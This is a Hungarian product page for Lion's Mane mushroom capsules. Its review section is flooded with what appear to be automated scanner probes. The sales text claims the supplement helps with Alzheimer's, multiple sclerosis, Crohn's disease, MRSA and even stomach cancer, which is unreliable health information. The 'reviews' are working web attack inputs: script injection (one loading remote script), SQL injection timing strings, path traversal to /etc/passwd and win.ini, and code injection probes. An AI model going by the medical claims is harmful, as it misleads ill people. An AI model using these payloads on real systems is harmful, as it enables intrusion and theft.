kép

Lion’s Mane - Hericium erinaceus


Ár: 5 990 Ft

Share

A Hericium erinaceus főbb hatóanyagai a poliszacharidok (béta-glukánok), esszenciális aminosavak, de számos nyomelemet, valamint B-1, B2-vitamint is tartalmaz.
A Hericium erinaceus jótékony hatással van az Alzheimer-kór, a Sclerosis Multiplex, a Neuropathia, a gastritis, a demencia esetén, de sikeresen kezeltek már Chron-betegeket, valamint gyulladásos bélbetegségekben szenvedőket is a gomba kivonatával. Antioxidáns hatású, és erősíti a szervezet természetes védekező mechanizmusát. Hatóanyagainak köszönhetően csökkenti a szervezetben a vércukorszintet és a vérzsírszintet is.

A Hericium erinaceus hatóanyagai között megtalálhatók a poliszaccharidok, a fehérjék, a terpenoidok és a lektinek. Speciálisan csak ebben a gombában előforduló molekulák a következők: hericenon, erinacol, erinacin. Az Oroszlánsörény poliszaccharidjai tartalmaznak galaktózt és ramnózt. 

A gombában található - D-arabinitol, threitol, palmitinsav - vegyületek kiváló antioxidások, amelyek csökkentik a szervezetben a káros szabad gyökök számát. A gomba összetevői szabályozzák a szervezet vérzsírszintjét és jótékony hatással vannak a vércukorszintre, a gyomorfekélyre, refluxra és a nyálkahártya gyulladásos folyamataira is. Gyomorbántalmak és bélpanaszok esetén kiváló hatásúnak bizonyult.
Egyes kutatások szerint hatásos lehet akár gyomorrák esetén is.

Összetevők: Hericium erinaceus gombaszövedék-biotömeg formában, hidroxi-proril-metil-cellulóz

Hatóanyag 6db kapszulára vonatkoztatva: 
3000 mg Hericium erinaceus gombaszövedék-biotömeg formában

Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Csomagolási egység: A műanyag tégely 60db kapszulát tartalmaz

Alkalmazási területek:

demencia (szellemi hanyatlás)
Alzheimer-kór
Sclerosis Multiplex
idegkárosodás
neuropathia
gyomorhurut (gastritis)
idegrendszer erősítő

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Óvatosan adagolandó asztma és egyéb allergiás betegségek esetén! Mivel az Erinacine E potenciális agonistája (támogatója) a Kappa opioid receptoroknak, így a gomba magasabb dózisa hallucinogén tünetekkel járhat együtt.


Származási hely: Anglia


Hericium erinaceus : Majomfej gomba, Kínai süngomba, Oroszlánsörény gomba ( klinikai útmutató: Martin Powell)

Japán név - Yamabushitake
Kínai név - Hou Tou Gu/Majomfej gomba- kínai kultúrában fejedelmi ételnek számít
Angol név - Lion's Mane Mushroom /Oroszlánsörény gomba; Hedgehog Mushroom/Sündisznó gomba

A keleti gyógyászok körében már évszázadok óta megbecsült gyógygomba a kínai süngomba/H.erinaceus, amely hazánkban, mint ízletes, tápláló élelmiszergomba ismert. A legenda szerint, akik rendszeresen fogyasztják az oroszlánsörény gombát, azok acélidegzetűek lesznek és memóriájuk szinte tökéletessé válik. A H.erinaceus idegrendszerre gyakorolt kifejezett hatását annak köszönheti, hogy stimulálni képes a neuronok (idegsejtek) növekedési faktorát, a Neuron Growth Factor-t (NGF).  Az NGF pedig főszerepet játszik az idegsejtek, a központi- és perifériás idegrendszer kialakulásában, egészséges működésében, regenerációjában, ezért is hozható közvetlen összefüggésbe az NGF szint csökkenése a korai Alzheimer kórral és az elbutulással.

A H.erinaceus két cyathane származékáról derült ki, hogy kifejezett NGF stimuláló hatással rendelkezik: a hericenones (a gombatestből izolálva) és az erinacines (gombafonalakból izolálva).  Ezek a molekulák elég kicsik ahhoz, hogy áthaladjanak a vér-agy gáton, és szintén evidens, hogy fokozzák az idegrostok myelinhüvelyének (védőburkának) képződését.

Ámbár a terápiás érdeklődés cél majomfej gomba idegrendszeri/neurológiai funkciókra vetült, addig az NGF szélesebb feladatkörrel is rendelkezik, mégpedig az egész szervezet homeosztázisának, egyensúlyának fenntartása. Az NGF-nek köztudott szerepe van az inzulintermelésben, a vérnyomás szabályozásában és mint potenciális antioxidáns, plazmaszintjének csökkenése összefüggésbe hozható a szív-és érrendszeri betegségek, valamint a metabolikus szindróma (pl. II-es típusú cukorbetegség, elhízás, magas vérzsír és koleszterinszint, stb.) kialakulásával is. 

Bebizonyosodott, hogy az NGF gyorsítja a sebgyógyulást, valamint látványos javulást idéz elő a bőr és a szaruhártya fekélyek esetén. 

Állatkísérletek kimutatták, hogy az NGF jelentősen pozitív hatással van a légúti gyulladásos, de különösen asztmás megbetegedések kimenetelére.

 Az NGF szint befolyással van az immunrendszer állapotára, mivel az agysérülés után hirtelen megnövekedett NGF szintjének köszönhető az immunrendszer fokozott citokin kibocsájtása. Ezzel egy időben az immunrendszer sejtjei érzékennyé válnak az NGF –re, így részévé válik a szervezet immunválaszának. A H.erinaceus immunrendszerre kifejtett pozitív hatása miatt felgyorsul betegségek utáni felépülés.

Elbutulás/ demenecia, depresszió
Kontrollált vizsgálat igazolta a H.erinaceus alkalmazásának pozitív hatását az enyhe elbutulás (demencia) során. Az egyik tanulmány szerint az 5g/nap H.erinaceus gombatest kivonatot (levesben) fogyasztó betegek nagy részénél pozitív változást észleltek a tanult alapműveletek elvégzésekor (étkezés, öltözködés, séta, stb.), majd egy 30 főt vizsgáló klinikai vizsgálatban a kezelt csoportnál jelentős javulást észleltek a kognitív funkciókban, szemben a nem kezelt, kontroll csoporttal. 
A megnövekedett NGF termelés javíthatja az agy funkcióit, lassítja öregedési folyamatát, így gátolja az időskori szenilitás és az Alzheimer kór kialakulását. A népgyógyászatban depresszió csökkentésére is használják.

Sclerosis Multiplex
E súlyos betegségben szenvedő betegeknél a H.erinaceus gombatest kivonata javulást idézett elő, miáltal fokozódott az idegrostok myelinhüvelyének regenerációja. Mindez az NGF megnövekedett szintjével magyarázható, amely hozzájárult az idegvégződések és a myelinhüvely védelméhez, valamint az immunstimuláló hatása révén a gyulladás és az idegrendszer károsító folyamatok megfékezéséhez.

Neuropátia/ Idegbántalom
In vitro és in vivo (testen kívüli és testen belüli) klinikai vizsgálatok is igazolták az NGF szerepét a fájdalomérzet leképzésében. A megnövekedett NGF szint csökkentette a cukorbetegek és a HIV betegek fájdalmas neuropátiáját.  

Idegkárosodás
Patkánykísérletek igazolták, hogy a H.erinaceus kivonatának adagolása során felgyorsult az idegkárosodás regenerációja, és a felépülés annál gyorsabb volt, minél korábban kezdték el adagolni a gombakivonatot.

MRSA (methicillin/oxacillin rezisztens staphylococcus aureus okozta fertőzések, leggyakrabban sebfertőzés, bőr-, lágyrészfertőzés, véráramfertőzés=szepszis, tüdőgyulladás)
Japán klinikai tesztek igazolták, hogy a H.erinaceus adagolása antibakteriális hatással bírt az MRSA-s betegeknél.

Gyomorhurut, gyomorfekély
Kínában már régóta használatos Hericium erinaceus gombafonalainak kivonatának alkalmazása egyes gyomor-bélrendszeri problémáknál, mint pl. krónikus gyomor- és bélhurut, gyomorfekély, gyomor- és nyelőcsőrák. Ez a majomfej gomba cyathane származékának antibakteriális, vagyis a Helicobacter pylori elleni hatásával magyarázható. De a Hericium erinaceus gombakivonattal már sikeresen kezeltek Chron-betegeket is

KLINIKAI ÖSSZESÍTŐ

Terápiás jelentősége: 
Elbutulás, Alzheimer-kór, idegkárosodás regenerációja, és pozitív változások klinikai evidencia nélkül a sclerosis multiplexes betegeknél.
Fő hatóanyagai:
- cyathane származékai: ericenones és az erinacines 

Figyelmeztetés!
Óvatosan adagolandó asztma és egyéb allergiás betegségek esetén! Mivel az Erinacine E potenciális agonistája (támogatója) a Kappa opioid receptoroknak, így a gomba magasabb dózisa hallucinogén tünetekkel járhat együtt.

Lion’s Mane - Hericium erinaceus (cseppkőgomba)


Összetevők: Hericium erinaceus gombaszövedék-biotömeg formában, hidroxi-proril-metil-cellulóz

OÉTI:9809/2011

Kiszerelés: 60db kapszula/doboz

Összetevők: Hericium erinaceus gombaszövedék-biotömeg formában, hidroxi-proril-metil-cellulóz

Hatóanyag 6db kapszulára vonatkoztatva: 
3000 mg Hericium erinaceus gombaszövedék-biotömeg formában

Adagolás: 2-6 kapszula/nap (A kapszulákat étkezés előtt vegye be!)

Csomagolási egység: A műanyag tégely 60db kapszulát tartalmaz

Figyelmeztetés: Ne használja a készítményeket terhesség és szoptatás ideje alatt. Használat előtt kérdezze meg kezelőorvosát, gyógyszerészét, valamint a következő esetekben: ha teherbeesést segítő készítményt szed, gyógyszert szed vagy orvosi kezelés alatt áll. Hosszú ideig tartó használatra nem javallott. Az étrend-kiegészítő nem helyettesíti a vegyes étrendet (és az egészséges életmódot)! Az ajánlott napi mennyiséget ne lépje túl!
Származási hely: Anglia

omyxxndm 2020-08-15 19:41:11
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ifRAme sRc=9099.com></IfRamE>
omyxxndm 2020-08-15 19:40:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<W6YKII>LBUEL[!+!]</W6YKII>
omyxxndm 2020-08-15 19:40:44
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!CTTlJ <ScRiPt >p8b0(9171)</ScRiPt>
ggmrgtmd 2020-08-15 19:40:40
Értékelés:
../../../../../../../../../../../../../../../proc/version
omyxxndm 2020-08-15 19:40:39
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<% contenteditable onresize=p8b0(9930)>
ggmrgtmd 2020-08-15 19:40:37
Értékelés:
../../../../../../../../../../etc/passwd
omyxxndm 2020-08-15 19:40:35
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!}body{acu:Expre/**/SSion(p8b0(9535))}
omyxxndm 2020-08-15 19:40:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img<!-- --> src=x onerror=alert(9491);//><!-- -->
omyxxndm 2020-08-15 19:40:24
Értékelés:
[url=http://www.vulnweb.com][/url]
omyxxndm 2020-08-15 19:40:17
Értékelés:
<a HrEF=jaVaScRiPT:>
omyxxndm 2020-08-15 19:40:09
Értékelés:
<a HrEF=http://www.vulnweb.com></a>
omyxxndm 2020-08-15 19:40:01
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<input autofocus onfocus=p8b0(9382)>
omyxxndm 2020-08-15 19:39:55
Értékelés:
omyxxndm 2020-08-15 19:39:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!&lt;ScRiPt&gt;p8b0(9976)&lt;/sCripT&gt;
omyxxndm 2020-08-15 19:39:44
Értékelés:
Írj véleményt a termékről!\u003CScRiPt\p8b0(9509)\u003C/sCripT\u003E
omyxxndm 2020-08-15 19:39:36
Értékelés:
%25%63%33%25%38%64%72%6A%25%32%30%76%25%63%33%25%61%39%6C%65%6D%25%63%33%25%61%39%6E%79%74%25%32%30%61%25%32%30%74%65%72%6D%25%63%33%25%61%39%6B%72%25%63%35%25%39%31%6C%21%3C%53%63%52%69%50%74%20%3E%70%38%62%30%289792%29%3C%2F%73%43%72%69%70%54%3E
omyxxndm 2020-08-15 19:39:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img/src=">" onerror=alert(9201)>
omyxxndm 2020-08-15 19:39:23
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=xyz OnErRor=p8b0(9479)>
omyxxndm 2020-08-15 19:39:16
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<img src=//testasp.vulnweb.com/t/dot.gif onload=p8b0(9362)>
omyxxndm 2020-08-15 19:39:06
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<body onload=p8b0(9651)>
omyxxndm 2020-08-15 19:38:54
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9244'>
omyxxndm 2020-08-15 19:38:45
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<isindex type=image src=1 onerror=p8b0(9715)>
omyxxndm 2020-08-15 19:38:39
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<svg
jboupwew 2020-08-15 19:38:31
Értékelés:
201'
omyxxndm 2020-08-15 19:38:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<video><source onerror="javascript:p8b0(9237)">
jboupwew 2020-08-15 19:38:29
Értékelés:
Yyf0cLBJ'));select pg_sleep(3); --
jboupwew 2020-08-15 19:38:27
Értékelés:
rlvazVDt');select pg_sleep(6); --
jboupwew 2020-08-15 19:38:25
Értékelés:
l5eULFHZ');select pg_sleep(3); --
omyxxndm 2020-08-15 19:38:24
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >p8b0(9210)</ScRiPt>
jboupwew 2020-08-15 19:38:21
Értékelés:
vDHxVvEl';select pg_sleep(3); --
jboupwew 2020-08-15 19:38:19
Értékelés:
mJ976KGb'; waitfor delay '0:0:3' --
omyxxndm 2020-08-15 19:38:18
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9441></ScRiPt>
jboupwew 2020-08-15 19:38:16
Értékelés:
1 waitfor delay '0:0:9' --
jboupwew 2020-08-15 19:38:14
Értékelés:
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
omyxxndm 2020-08-15 19:38:12
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >p8b0(9694)</ScRiPt>
jboupwew 2020-08-15 19:38:08
Értékelés:
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
jboupwew 2020-08-15 19:38:06
Értékelés:
-1" OR 2+931-931-1=0+0+0+1 --
omyxxndm 2020-08-15 19:38:05
Értékelés:
Írj véleményt a termékről!<ScR<ScRiPt>IpT>p8b0(9526)</sCr<ScRiPt>IpT>
jboupwew 2020-08-15 19:38:02
Értékelés:
-1' OR 2+954-954-1=0+0+0+1 or 'nBIyXXRw'='
omyxxndm 2020-08-15 19:37:59
Értékelés:
Írj véleményt a termékről!<script>p8b0(9368)</script>
jboupwew 2020-08-15 19:37:57
Értékelés:
-1' OR 2+533-533-1=0+0+0+1 --
jboupwew 2020-08-15 19:37:55
Értékelés:
-1 OR 2+759-759-1=0+0+0+1
omyxxndm 2020-08-15 19:37:54
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WX0SJM>BCUY5[!+!]</WX0SJM>
jboupwew 2020-08-15 19:37:53
Értékelés:
-1 OR 2+106-106-1=0+0+0+1 --
jboupwew 2020-08-15 19:37:50
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
omyxxndm 2020-08-15 19:37:49
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >p8b0(9164)</ScRiPt>
jboupwew 2020-08-15 19:37:48
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
omyxxndm 2020-08-15 19:37:46
Értékelés:
{{10000375*9999398}}
omyxxndm 2020-08-15 19:37:40
Értékelés:
CWS000x
omyxxndm 2020-08-15 19:37:30
Értékelés:
acux4895
omyxxndm 2020-08-15 19:37:21
Értékelés:
acu10527<s1﹥s2ʺs3ʹuca10527
omyxxndm 2020-08-15 19:37:15
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!9144178
WEB-INF\web.xml 2020-08-15 19:37:07
Értékelés:
Írj véleményt a termékről!
omyxxndm 2020-08-15 19:37:05
Értékelés:
'"()&%<acx><ScRiPt >p8b0(9707)</ScRiPt>
pomknbem 2020-08-15 19:36:57
Értékelés:
WEB-INF/web.xml 2020-08-15 19:36:55
Értékelés:
Írj véleményt a termékről!
omyxxndm 2020-08-15 19:36:54
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!'"()&%<acx><ScRiPt >p8b0(9718)</ScRiPt>
pomknbem 2020-08-15 19:36:53
Értékelés:
pomknbem 2020-08-15 19:36:46
Értékelés:
JyI=
pomknbem 2020-08-15 19:36:42
Értékelés:
@@3qmby
pomknbem 2020-08-15 19:36:39
Értékelés:
1
pomknbem 2020-08-15 19:36:36
Értékelés:
\
pomknbem 2020-08-15 19:36:32
Értékelés:
1'"
pomknbem 2020-08-15 19:36:28
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 2020-08-15 19:36:25
Értékelés:
Írj véleményt a termékről!
..\..\..\..\..\..\..\..\windows\win.ini 2020-08-15 19:36:21
Értékelés:
Írj véleményt a termékről!
................windowswin.ini 2020-08-15 19:36:19
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../windows/win.ini.jpg 2020-08-15 19:36:13
Értékelés:
Írj véleményt a termékről!
C:\WINDOWS\system32\drivers\etc\hosts 2020-08-15 19:36:08
Értékelés:
Írj véleményt a termékről!
nptdptdq 2020-08-15 19:36:08
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../windows/win.ini 2020-08-15 19:36:02
Értékelés:
Írj véleményt a termékről!
jboupwew 2020-08-15 19:35:56
Értékelés:
Írj véleményt a termékről!
WEB-INF\web.xml 2020-08-15 19:35:55
Értékelés:
Írj véleményt a termékről!
/WEB-INF/web.xml 2020-08-15 19:35:51
Értékelés:
Írj véleményt a termékről!
jboupwew 2020-08-15 19:35:50
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 19:35:49
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:35:48
Értékelés:
Írj véleményt a termékről!
gcfhvqoh 2020-08-15 19:35:47
Értékelés:
Írj véleményt a termékről!
/\../\../\../\../\../\../\../etc/passwd 2020-08-15 19:35:46
Értékelés:
Írj véleményt a termékről!
file:///etc/passwd 2020-08-15 19:35:44
Értékelés:
Írj véleményt a termékről!
{{9999272*9999593}} 2020-08-15 19:35:38
Értékelés:
Írj véleményt a termékről!
.. 2020-08-15 19:35:36
Értékelés:
Írj véleményt a termékről!
acux6875 2020-08-15 19:35:24
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:35:23
Értékelés:
Írj véleményt a termékről!
%2fetc%2fpasswd 2020-08-15 19:35:21
Értékelés:
Írj véleményt a termékről!
/etc/passwd 2020-08-15 19:35:18
Értékelés:
Írj véleményt a termékről!
2020-08-15 19:35:15
Értékelés:
Írj véleményt a termékről!
2020-08-15 19:35:10
Értékelés:
Írj véleményt a termékről!
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 2020-08-15 19:35:06
Értékelés:
Írj véleményt a termékről!
JyI= 2020-08-15 19:35:03
Értékelés:
Írj véleményt a termékről!
acu1207<s1﹥s2ʺs3ʹuca1207 2020-08-15 19:35:00
Értékelés:
Írj véleményt a termékről!
@@VaTwS 2020-08-15 19:34:56
Értékelés:
Írj véleményt a termékről!
vdptvxjt 2020-08-15 19:34:55
Értékelés:
${@print(md5(acunetix_wvs_security_test))}\
rcedgnpx 2020-08-15 19:34:54
Értékelés:
lions-mane---hericium-erinaceus/.
../../../../../../../../../../etc/passwd.jpg 2020-08-15 19:34:53
Értékelés:
Írj véleményt a termékről!
vdptvxjt 2020-08-15 19:34:53
Értékelés:
${@print(md5(acunetix_wvs_security_test))}
rcedgnpx 2020-08-15 19:34:51
Értékelés:
lions-mane---hericium-erinaceus
vdptvxjt 2020-08-15 19:34:49
Értékelés:
";print(md5(acunetix_wvs_security_test));$a="
niecywma9297812 2020-08-15 19:34:49
Értékelés:
Írj véleményt a termékről!
1 2020-08-15 19:34:48
Értékelés:
Írj véleményt a termékről!
vdptvxjt 2020-08-15 19:34:46
Értékelés:
';print(md5(acunetix_wvs_security_test));$a='
\ 2020-08-15 19:34:46
Értékelés:
Írj véleményt a termékről!
rcedgnpx 2020-08-15 19:34:46
Értékelés:
lions-mane---hericium-erinaceus
../../../../../../../../../../etc/passwd 2020-08-15 19:34:44
Értékelés:
Írj véleményt a termékről!
rcedgnpx 2020-08-15 19:34:42
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
1'" 2020-08-15 19:34:41
Értékelés:
Írj véleményt a termékről!
vdptvxjt 2020-08-15 19:34:41
Értékelés:
;print(md5(acunetix_wvs_security_test));
ggmrgtmd 2020-08-15 19:34:37
Értékelés:
Írj véleményt a termékről!
niecywma'"()&% 2020-08-15 19:34:35
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:34
Értékelés:
Írj véleményt a termékről!
ggmrgtmd 2020-08-15 19:34:30
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:27
Értékelés:
Írj véleményt a termékről!
rcedgnpx 2020-08-15 19:34:24
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:23
Értékelés:
Írj véleményt a termékről!
niecywma 2020-08-15 19:34:22
Értékelés:
Írj véleményt a termékről!
njofnjaa 2020-08-15 19:34:21
Értékelés:
<!--
ggmrgtmd 2020-08-15 19:34:20
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:19
Értékelés:
Írj véleményt a termékről!
njofnjaa 2020-08-15 19:34:16
Értékelés:
'"
ggmrgtmd 2020-08-15 19:34:14
Értékelés:
Írj véleményt a termékről!
niecywma 2020-08-15 19:34:13
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:13
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:10
Értékelés:
Írj véleményt a termékről!
ggmrgtmd 2020-08-15 19:34:09
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:08
Értékelés:
Írj véleményt a termékről!
ggmrgtmd 2020-08-15 19:34:07
Értékelés:
Írj véleményt a termékről!
niecywma 2020-08-15 19:34:07
Értékelés:
Írj véleményt a termékről!
pomknbem 2020-08-15 19:34:05
Értékelés:
Írj véleményt a termékről!
rcedgnpx 2020-08-15 19:34:04
Értékelés:
Írj véleményt a termékről!